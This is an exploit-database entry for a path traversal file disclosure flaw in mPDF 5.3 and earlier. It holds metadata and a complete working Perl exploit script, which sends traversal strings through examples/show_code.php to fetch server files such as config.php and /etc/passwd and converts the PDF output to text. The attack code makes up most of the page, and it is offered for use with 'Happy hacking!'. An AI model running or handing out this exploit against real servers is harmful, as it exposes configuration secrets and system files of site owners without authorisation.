mPDF - exploit.company

vendor:

mpdf

by:

ZadYree

7.5

CVSS

HIGH

File Disclosure

CWE

Product Name: mpdf

Affected Version From: 5.3 and prior

Affected Version To: 5.3 and prior

Patch Exists: NO

Related CWE: N/A

CPE: a:mpdf:mpdf

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Multiple

2011

mPDF <= 5.3 File Disclosure Exploit (0day)

This vulnerability, due to a weak filter, lets you download any unprotected remote content, under PDF format. The exploit may not work, depending on the set up htaccess/chmod rules on the remote server.

Mitigation:

Ensure that the filter is properly configured to prevent unauthorized access to files.

Source

Exploit-DB raw data:

# Exploit Title: mPDF <= 5.3 File Disclosure
# Google Dork: Please no dork
# Date: 16th December 2011
# Author: ZadYree
# Software Link: http://www.mpdf1.com/mpdf/download
# Version: 5.3 and prior
# Tested on: Multiple
# CVE : N/A

#!/usr/bin/perl -U
=head1 TITLE

mPDF <= 5.3 File Disclosure Exploit (0day)

=head2 SYNOPSIS

-- examples/show_code.php --

preg_match('/example[0]{0,1}(\d+)_(.*?)\.php/',$filename,$m); <--- URI unproperly filtered.
$num = intval($m[1]);
$title = ucfirst(preg_replace('/_/',' ',$m[2]));

if (!$num || !$title) { die("Invalid file"); }

=head2 DESCRIPTION

This vulnerability, due to a weak filter, lets you download any unprotected remote 
content, under PDF format.
The exploit may not work, depending on the set up htaccess/chmod rules on the 
remote server.

=head2 USAGE

perl exploit.pl -r http://p00niez.com/mpdf53/ ../config.php
perl exploit.pl -a http://p00niez.com/mpdf53/ /etc/passwd

Requiered modules:
PDF::OCR2
LWP::Simple
File::Type

Download a module:
sudo cpan -fi install Module::Name

=head3 Author

Zadyree ~ 3LRVS Team | Blog: z4d.tuxfamily.org/blog

=head3 Thanks

PHDays CTF - Yes, CTFs sometime do give you 0dayz
3LRVS Team - Support

=cut

#************* Configuration **************#
my $pdf_file = '/tmp/b00m.pdf';
$PDF::OCR2::CHECK_PDF = 0;
$del_temp_file = 1;
#******************************************#


use 5.010;
use PDF::OCR2;
use Getopt::Std;
use LWP::Simple;
use File::Type;
use constant TRUE => 1;
use constant FALSE => 0;

help() unless (@ARGV >= 2);

my (%optz, $uri);
getopts('rah', \%optz);
my $relative = $optz{'r'};
my $absolute = $optz{'a'};
my $help = $optz{'h'};
help() unless ($absolute || $relatife);

my ($purl, $fpath) = @ARGV;

my $name = $purl;
$name =~ s{http://(.+?)/.*} {$1};
$name .= ("_" . localtime(time) . ".txt");


$uri = '/examples/show_code.php?filename=example03_LRVS.php/../../../../../../../../' if ($absolute);
$uri = '/examples/show_code.php?filename=example03_LRVS.php/../../' if ($relative);

help() unless ($uri);

my $furl = $purl . $uri . $fpath;
$furl =~ s#(//)#$i++?"/":$1#eg; # Yeah that's twisted.

say "[*]Retrieving content...";
my $file = make_file(get($furl));
die "[-]The stream you requested is not well formatted (forbidden page, etc).\012" unless is_pdf($file);

say "[+]OK\012[*]Converting format...";
$pdf = PDF::OCR2->new($file);

my $text = $pdf->text;
$text =~ s/[^\x0A-\x7F]+?//gm;

open(my $fh, '>', $name);
print $fh $text;
close($fh);

say "[+]OK\012[+]Content successfully extracted!\nFile: ", $name;

unlink($pdf_file) if ($del_temp_file == TRUE);



sub make_file {
	my $content = shift;
	open($fh, '>', $pdf_file);
	print $fh $content;
	close($fh);
	return($pdf_file);
}

sub is_pdf {
	my $checked_file = shift;
	my $ft = File::Type->new();
	return(1) if ($ft->mime_type($checked_file) eq "application/pdf");
	return(0);
}

help() if ($help);

sub help {
	say <<"EOF";

Usage: perl $0 [-r|-a] http://[mPDF URL] <file_to_read>

Details:                   
                           -r : Relative path (ex: ../file.php)
                           -a : Absolute path (ex: /etc/file.zd)

For any more information, feel free to contact ZadYree
Happy hacking!
EOF
	exit(0);
}